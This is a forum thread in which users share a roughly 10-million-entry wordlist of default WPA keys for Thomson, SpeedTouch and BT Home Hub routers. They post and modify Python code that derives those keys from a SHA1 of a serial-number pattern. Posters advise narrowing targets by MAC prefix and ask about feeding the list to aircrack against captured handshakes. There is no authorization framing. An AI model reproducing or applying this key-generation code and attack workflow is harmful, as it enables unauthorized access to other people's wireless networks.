Need help with a very specific wordlist [stkeys]

[jonathan11]

Here is the wordlist I generated with wifipassreminder, there is two mirrors let me know in PM if they would die.
The uncompressed version is about ~104MB, containing almost 10.000.000 keys

Mirror #1 (Swedish host)
Mirror #2

Thanks to the person behind wifipassreminder and also Liuser for helping me format the list!

[skor78]

Thanx for this. Is this wordlist with keys only for 2010?

[jonathan11]

Thanx for this. Is this wordlist with keys only for 2010?

Nope this is the whole list that I got, which should be up TO 2010 if I understood everything.

[Snayler]

Thanx for this. Is this wordlist with keys only for 2010?

EDIT: After analysing the source code of wifipassreminder, I noticed it would only calculate passwords until 2009. The code is as follows:

Code:

    def dict(self):
        year = 6
        week = 1
        ii = 1
        f = open(os.path.dirname(__file__)+'/dic.lst', 'r')
        x = open(os.path.dirname(__file__)+'/file.lst', 'a+')
        while (ii <= 46656):
            dict=f.readline().replace('\n','')
            dicthex=str.upper(dict.encode("hex"))
            while (week <= 52):
                if week >= 10:
                    semana = str(week)
                if week < 10:
                    semana = "0" + str(week)
                while (year <= 9):
                    yy="0" + str(year)
                    nome = "CP"+yy+semana+dicthex
                    hash = str.upper(hashlib.sha1(nome).hexdigest())
                    password = hash[:10]
                    ssid = hash[-6:]
                    x.write(ssid+"|"+password+"\n")
                    year = year + 1
                week = week + 1
                year=6
            week=1
            ii = ii + 1

According to this, it will calculate passwords from 2006 until 2009. The code should be easy to alter to make it dump 2010 only passwords. I'll keep posting.

Ok, I changed the code like this(the red parts are the ones I removed/edited):

Code:

    def dict(self):
        year = 10
        week = 1
        ii = 1
        f = open(os.path.dirname(__file__)+'/dic.lst', 'r')
        x = open(os.path.dirname(__file__)+'/file.lst', 'a+')
        while (ii <= 46656):
                dict=f.readline().replace('\n','')
                dicthex=str.upper(dict.encode("hex"))
                while (week <= 52):
                    if week >= 10:
                        semana = str(week)
                    if week < 10:
                        semana = "0" + str(week)
                    while (year <= 10):
                        yy=str(year)
                        nome = "CP"+yy+semana+dicthex
                        hash = str.upper(hashlib.sha1(nome).hexdigest())
                        password = hash[:10]
                        x.write(password+"\n")
                        year = year + 1
                    week = week + 1
                    year=10
                week=1
                ii = ii + 1

After running the application, it dumped a 27.7Mb file, which I hope only contains 2010 keys. If anyone detects some flaw in the changes I made, feel free to talk!

[skor78]

Snayler, once again your help has been a bless to this total linux noob.. (snif..)
I'm glad to know this idea is being useful to more people than me.

Have you checked with the app developer if your correction is ok? Also, are u sure jonathan wordlist is from 2004 to 2010? After reading what u said, it seems the wordlist it's only 2004-2009.. unless he also changed the app.. Right?

Can u post a torrent/hxxp from the file created?

I'm currently having another issue in my BT partition, and tonight i need to work in expanding the partition.. I just hope i don't ruin anything.. Wish me luck!

Once again, thanx for all the help!

Cheers!

[pentest09]

Hi all,
I have used stkeys in the past from GNU citizen and it creates a file with all possible keys for the ssid about 80 or so by reverse engineering the algorithm found to be used by thomson, when i used it to check a BTHomeHub I already knew the key so I just searched the file and it was there but this only worked on BTHomeHub not the BTHomeHub2 so i guess this is working for the more recent versions. Is there any tutorial on this script it looks very interesting. stkeys was very good and still is on some old versions I think what it did was calculate the possible keys and then auto tried to connect using the keys generated until the correct one was used. Correct me if im wrong. This new tool could be great on backtrack as at present it seems a bit hit and miss with creating your own tables from a dictionary ie cowpatty etc.

Keep up the good work this could be a very long thread.

Regards Dee

[skor78]

Dee,

For BTHomeHub tool, just google BTHHKeygen and download Adrien Pastor files.. This situation it's a bit similar, but instead of 80 keys, you have all, to attack any Thomson/SpeedTouch/BTHH, either the new ones from 2010 (SSID is no longer from the hash1, but last 6 digits from MAC) or ANY router with a changed SSID, but with default key still used.. This is easy to check, u just grab the first 6 digits from MAC and check HERE if it's a thomson/st router.. If the key is still default, this will reduce your attack time drastically!

Glad to see more and more people joining in!

Cheers!

[pentest09]

Doesn't this tool only work for wep Keys? Before we get to much into the bthomehub tools stuff and thread closed as not due to backtrack tools I would like to know if your wifi reminder works on bt and is there a tut on this tool as it would be great to keep backtrack as dist of choice for all attacks.

Please advise and thanks for reply.

[skor78]

Dee,

For WEP all this is useless.. I don't need extra tools to something that's already done in 2min...
"For BTHomeHub tool (WPA!!), just google BTHHKeygen and download Adrien Pastor files.." (Default WEP Keys doesn't mean default WEP encryption, just read GNU Citizen again)
For Thomson/ST/BTHH (changed SSID) use this dictionary..
wifipassreminder is not ours.. google it and you'll find the project home page. Yes, it's linux supported, and no, there's no need for a tut., it's pretty straight forward, and once you'll use it, you'll have all your doubts answered.

Cheers.

[pentest09]

I dont need to know wep cracking aircracks the tool of choice on that , thats fine, got the hang of wifipassreminder outputs a lst file with keys can these be used as dict attack with aircrack for wpa with the handshake capture?

regards.